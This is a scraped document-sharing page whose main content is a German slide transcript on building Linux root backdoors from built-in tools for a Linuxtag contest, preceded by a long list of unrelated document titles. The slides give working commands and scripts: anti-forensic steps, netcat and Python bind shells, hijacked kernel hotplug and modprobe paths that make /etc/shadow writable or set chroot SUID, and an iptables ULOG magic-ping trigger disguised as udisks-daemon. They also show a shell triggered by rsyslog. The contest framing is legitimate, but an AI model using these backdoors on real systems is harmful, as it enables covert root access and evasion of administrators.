Backdoors mit Bordmitteln Vol.2



Ähnliche Dokumente
Backdoors mit Bordmitteln Vol.c3d2

Backdoors mit Bordmitteln Vol.2ubu

Backdoors mit Bordmitteln

Firewalling. Michael Mayer IAV0608 Seite 1 von 6

Der zweite all unsere Datenbanken. Dieser Befehl ist etwas komplexer, aber bis auf das Passwort (kursiv fett) so zu übernehmen:

mit ssh auf Router connecten

MSXFORUM - Exchange Server 2003 > SMTP Konfiguration von Exchange 2003

SFTP SCP - Synology Wiki

ADDISON Aktenlösung Automatischer Rewe-Import. Technische Beschreibung

CMS.R. Bedienungsanleitung. Modul Cron. Copyright CMS.R Revision 1

Wir machen neue Politik für Baden-Württemberg

Programme im Griff Was bringt Ihnen dieses Kapitel?

Arbeit zur Lebens-Geschichte mit Menschen mit Behinderung Ein Papier des Bundesverbands evangelische Behindertenhilfe e.v.

Dateisystem 1, Suchpfad, Befehlstypen

Dateisystem 1, Suchpfad, Befehlstypen

Advoware mit VPN Zugriff lokaler Server / PC auf externe Datenbank

HANDBUCH PHOENIX II - DOKUMENTENVERWALTUNG

Tutorial -

Workflows verwalten. Tipps & Tricks

Übung - Konfigurieren einer Windows 7-Firewall

Primzahlen und RSA-Verschlüsselung

Firewall Implementierung unter Mac OS X

Luis Kornblueh. May 22, 2014

Anleitung über den Umgang mit Schildern

Dokumentenverwaltung im Internet

Der Kalender im ipad

Menü auf zwei Module verteilt (Joomla 3.4.0)

Einrichtung des Cisco VPN Clients (IPSEC) in Windows7

Sichere Anleitung Zertifikate / Schlüssel für Kunden der Sparkasse Germersheim-Kandel. Sichere . der

Intrusion Prevention mit IPTables. Secure Linux Administration Conference, 6. / 7. Dec Dr. Michael Schwartzkopff. iptables_recent, SLAC 2007 / 1

Dieser Text beschreibt die Neuerungen von DaNiS und die Vorgehensweise beim DaNiS-Update.

1 Einleitung. Lernziele. automatische Antworten bei Abwesenheit senden. Einstellungen für automatische Antworten Lerndauer. 4 Minuten.

PC Hack erkennen 3 - Rootkits & versteckte Trojaner aufspühren

Schnellanleitung: Verbuchung von Studien- und Prüfungsleistungen

Zehn SSH Tricks. Julius Plen z

Wenn man nach Beendigung der WINDOWS-SICHERUNG folgendes angezeigt bekommt

SCHRITT 1: Öffnen des Bildes und Auswahl der Option»Drucken«im Menü»Datei«...2. SCHRITT 2: Angeben des Papierformat im Dialog»Drucklayout«...

Statuten in leichter Sprache

Anleitung für die Verwendung des Helferportals

Stand: Adressnummern ändern Modulbeschreibung

Kleines Handbuch zur Fotogalerie der Pixel AG

Migration Howto. Inhaltsverzeichnis

Stepperfocuser 2.0 mit Bootloader

ISL Schulungs-Angebot Stärker werden und etwas verändern!

AutoTexte und AutoKorrektur unter Outlook verwenden

In diesem Bereich wird beschrieben, wie Sie eine Datensicherung der Software Jack Plus durchführen können.

Leit-Bild der Sonnenhofschule

OP-LOG

Anleitung zur Einrichtung eines Netzwerkes für den Gebrauch von GVService unter Windows 7

Installationsanleitung für pcvisit Server (pcvisit 12.0)

Der Gabelstapler: Wie? Was? Wer? Wo?

Einrichten einer mehrsprachigen Webseite mit Joomla (3.3.6)

Konfigurationsanleitung Access Control Lists (ACL) Funkwerk. Copyright Stefan Dahler Oktober 2008 Version 1.0.

Anbindung des eibport an das Internet

Info-Veranstaltung zur Erstellung von Zertifikaten


Installation des Add-Ins für Lineare Algebra in Microsoft Excel

Installation von Druckern auf dem ZOVAS-Notebook. 1. Der Drucker ist direkt mit dem Notebook verbunden

AGROPLUS Buchhaltung. Daten-Server und Sicherheitskopie. Version vom b

Ihre Lizenz ändern. Stand 01/2015

Erfahrungen mit Hartz IV- Empfängern

Schritt für Schritt Installationsanleitung -> CAS genesisworld SwissEdition

Installation Linux agorum core Version 6.4.5

Was meinen die Leute eigentlich mit: Grexit?

VNUML Projektpraktikum

1. Adressen für den Serienversand (Briefe Katalogdruck Werbung/Anfrage ) auswählen. Die Auswahl kann gespeichert werden.

CAQ Software für Ihr Qualitätsmanagement. Ablauf für die Erfassung der Fehler in der Fertigung

AXIGEN Mail Server. s per Smarthost versenden s per Pop3 empfangen. Produkt Version: Dokument Version: 1.2

UserManual. Handbuch zur Konfiguration einer FRITZ!Box. Autor: Version: Hansruedi Steiner 2.0, November 2014

Übung - Konfigurieren einer Windows-XP-Firewall

Anleitung zur Erstellung von Serienbriefen (Word 2003) unter Berücksichtigung von Titeln (wie Dr., Dr. med. usw.)

Stellvertretenden Genehmiger verwalten. Tipps & Tricks

In diesem Bereich wird beschrieben, wie Sie eine Datensicherung der Software Jack Plus durchführen können.

Was ist das Budget für Arbeit?

a.sign Client Lotus Notes Konfiguration

ANLEITUNG NETZEWERK INSTALATION

Installationsanleitung für pcvisit Server (pcvisit 15.0)

Windows 7/8 - Backdoor

Browsereinstellungen für moneycheck24 in Explorer unter Windows

1) JAVA JRE auf der QNAP Box installieren

Fotos in Tobii Communicator verwenden

Hilfedatei der Oden$-Börse Stand Juni 2014

Was muss gesichert werden? -Ihre angelegten Listen und Ihre angelegten Schläge.

Inhaltverzeichnis 1 Einführung Zugang zu den Unifr Servern Zugang zu den Druckern Nützliche Links... 6

Um in das Administrationsmenü zu gelangen ruft Ihr Eure Seite auf mit dem Zusatz?mod=admin :

Safeterms.de AGB Update Schnittstelle gambio Shopsoftware

Erklärung zu den Internet-Seiten von

Lizenzen auschecken. Was ist zu tun?

Websites mit Dreamweaver MX und SSH ins Internet bringen

A n l e i t u n g : F i r m w a r e U p d a t e d u r c h f ü h r e n

BashView. Es muss nicht immer Nagios sein. Source Talk Tage 2013

Kapitel 3 Bilder farblich verändern - Arbeiten mit Objekten

Krippenspiel für das Jahr 2058

Windows 7 Ordner und Dateien in die Taskleiste einfügen

SelfLinux cron

ways2gether ipad App Guide

Professionelle Seminare im Bereich MS-Office

Artikel Schnittstelle über CSV

CTX 609 Daten Fax Modem. Installation Creatix V92 Data Fax Modem (CTX 609) unter Windows XP/ Windows Installation unter Windows XP:

Um die Patientenverwaltung von Sesam zu nutzen, muss man die Patienten natürlich zuerst in die Kartei eintragen.

Transkript:

... und wie kann man das triggern? 13. März 2013

Wie wo was? Einführung und Motivation Hackingcontest auf dem Linuxtag (müsste eigentlich Backdoor Contest heißen) Zu gewinnen gibt es Ruhm, Ehre und nette Gadgets Gesponsert von Sophos

Situation Einführung und Motivation Admin verlässt seinen Arbeitsplatz und hat eine Rootshell offen gelassen Ein paar Linuxkundige stellen lustige Dinge TM mit dem System an Admin merkt, dass etwas nicht stimmt

Warum Bordmittel? Contest-Regeln Meistens Default-Desktopinstallation Distribution ist vorher nicht bekannt Kein Zugang zum Internet Keine Datenträger außer Papier erlaubt Kein Reboot erlaubt

Ablauf Einführung und Motivation Drei Phasen, jeweils 15 Minuten 1 Die beiden Teams setzen sich an die vorbereiteten Rechner mit offnener Rootshell und bauen ihre Backdoors ein. 2 Die Teams tauschen die Plätze und schlüpfen in die Rolle des Administrators, der die eingebauten Backdoors sucht. Für gefundene und entfernte Backdoors gibt es Punkte. 3 Die Teams tauschen nochmal die Plätze und demonstrieren ihre verbliebenen Backdoors in Aktion. Funktionierende Backdoors geben nochmal Punkte.

Sicherheitsvorkehrungen.bash_history auf /dev/null symlinken Schreiben von.viminfo deaktivieren Alias zum Zurücksetzen von Timestamps alias old= touch -r /etc/services Auf SELinux-Systemen enforcing mode ausschalten setenforce 0

Kein C-Compiler, was nun? Konfigurationsdateien ändern Skripte oder andere Mechanismen finden, die mit root-rechten ablaufen, jedoch durch Nutzeraktionen triggerbar sind netcat is your best friend nc -l -p <port> -e /bin/sh C-Quelltexte einhacken dauert oft zu lang (15 Minuten sind verdammt wenig Zeit... )

netcat fehlt, was nun? Remote shell helper in Python (/sbin/ncsh) #!/usr/bin/python import os from socket import * fd = socket(af_inet,sock_stream,ipproto_tcp) fd.setsockopt(sol_socket,so_reuseaddr,1) fd.bind(("",2400 + os.getpid() % 10)) fd.listen(1) sock, remote = fd.accept() os.dup2(sock.fileno(), 0) os.dup2(sock.fileno(), 1) os.execl("/bin/bash", "bash")

hot tty Einführung und Motivation Das Benutzen von /dev/tty42 soll die Datei /etc/shadow für alle schreibbar machen /dev/tty42 für alle schreibbar machen Verbiegen des hotplug-pfads auf ein eigenes Skript Skript ruft passendes chmod-kommando auf, wenn im Hotplug-Event die Minor-Gerätenummer auf 42 gesetzt ist

hot tty contd. Einführung und Motivation Ersatz für /sbin/hotplug (/lib/libhot.so) #!/bin/sh if [ "$MINOR" = "42" ] ; then chmod 666 /etc/shadow fi Skript als Hotplug-Helper eintragen # chmod 666 /dev/tty42 # echo /lib/libhot.so > /proc/sys/kernel/hotplug $ echo foobar > /dev/tty42 $ vi /etc/shadow

transform to root Der Aufruf von ip xfrm policy als unprivilegierter User soll das chroot-binary auf SUID root setzen Der Kernel lädt bei obigem Kommando das Modul xfrm_user nach (Aufruf von modprobe direkt durch den Kernel) Verbiegen des modprobe-pfads auf ein eigenes Skript Skript prüft auf den Modul-Alias net-pf-16-proto-6 und setzt beim Match das SUID-Bit von chroot Gibt es keinen Match, überlagert sich das Skript mit dem echten modprobe

transform to root contd. Ersatz für modprobe (/var/log/apt/.pkg) #!/bin/sh case "$@" in *net-pf-16-proto-6*) chmod 4755 /usr/sbin/chroot ;; *) exec modprobe "$@" ;; esac # echo /var/log/apt/.pkg > /proc/sys/kernel/modprobe $ ip xfrm policy $ /usr/sbin/chroot / /bin/bash -p

InSecure Shell Zugriff auf den SSH-Server mit einem SSH-Client soll eine Rootshell an einen hohen Port binden Blacklist-Datei für schwache OpenSSL-Keys gegen Gerätedatei austauschen Lesender Zugriff auf diese Gerätedatei triggert den Kernel, das zur Major/Minor-Nummer gehörende Kernelmodul zu laden (Aufruf von modprobe direkt durch den Kernel) Modulkonfiguration /etc/modprobe.d/aliases.conf so anpassen, dass anstelle des Kernelmoduls das Kommando ncsh ausgeführt wird

InSecure Shell contd. # cd /usr/share/ssh # mv blacklist.dsa-1024 blacklist.dsa-1024. # mknod blacklist.dsa-1024 c 242 0 # echo "alias char-major-242-* nix" \ >> /etc/modprobe.d/aliases.conf # echo "install nix ( /sbin/ncsh & ) &" \ >> /etc/modprobe.d/aliases.conf $ ssh bla@<target_ip> $ nc <target_ip> 240[0-9]

ULOG me in Einführung und Motivation Ein magisches Ping-Paket soll eine Rootshell an einen hohen Port binden Eine iptables-regel reagiert auf das Paket und benutzt das ULOG-Target (nicht in den Kernelmeldungen sichtbar) Ein Python-Skript lauscht auf einem Netlink-Socket und wartet auf ULOG-Nachrichten. Trifft eine Nachricht ein, startet das Kommando ncsh. Das Python-Skript soll als unverdächtiger Dienst getarnt werden

ULOG me in contd. ULOG listener (ulog) #!/usr/bin/python import os from socket import * bufsz = 32768 fd = socket(af_netlink, SOCK_RAW, 5) fd.setsockopt(sol_socket, SO_SNDBUF, bufsz) fd.setsockopt(sol_socket, SO_RCVBUF, bufsz) fd.bind((os.getpid(), 1)) while 1: cnt = fd.recv(bufsz) os.system("( /sbin/ncsh & ) &")

ULOG me in contd. # iptables -t mangle -A PREROUTING -p icmp -m length \ --length 800:900 -j ULOG # killall udisks-daemon # mount --bind /usr/bin/python \ /usr/lib/udisks/udisks-daemon # mount --bind ulog /dev/sr0 # ( /usr/lib/udisks/udisks-daemon /dev/sr0 & ) & # umount -l /usr/lib/udisks/udisks-daemon # umount -l /dev/sr0 # rm ulog $ ping -s 834 <target_ip> $ nc <target_ip> 240[0-9]

rsyslog me in Einführung und Motivation Ein magisches Syslog-Paket soll eine Rootshell an einen hohen Port binden Rsyslog umkonfigurieren, so dass Remote Syslog (514/udp) empfangen wird Log-Template definieren, das bei Log-Nachrichten von Facility local0 mit Loglevel alert ein externes Skript (/usr/bin/rlog) ausführt Das Skript startet (mal wieder :-)) den ncsh-helper

rsyslog me in contd. Anpassungen in /etc/rsyslog.conf --- rsyslog.conf.orig +++ rsyslog.conf -#$ModLoad imudp -#$UDPServerRun 514 +$ModLoad imudp +$UDPServerRun 514 $FileGroup adm $FileCreateMode 0640 +$template std,"def" $WorkDirectory /var/spool/rsyslog +local0.alert ^/usr/bin/rlog;std

rsyslog me in contd. Template-Skript (/usr/bin/rlog) #!/bin/sh ( /sbin/ncsh & ) & $ echo "<129>got root?" nc -u <target_ip> 514 $ nc <target_ip> 240[0-9]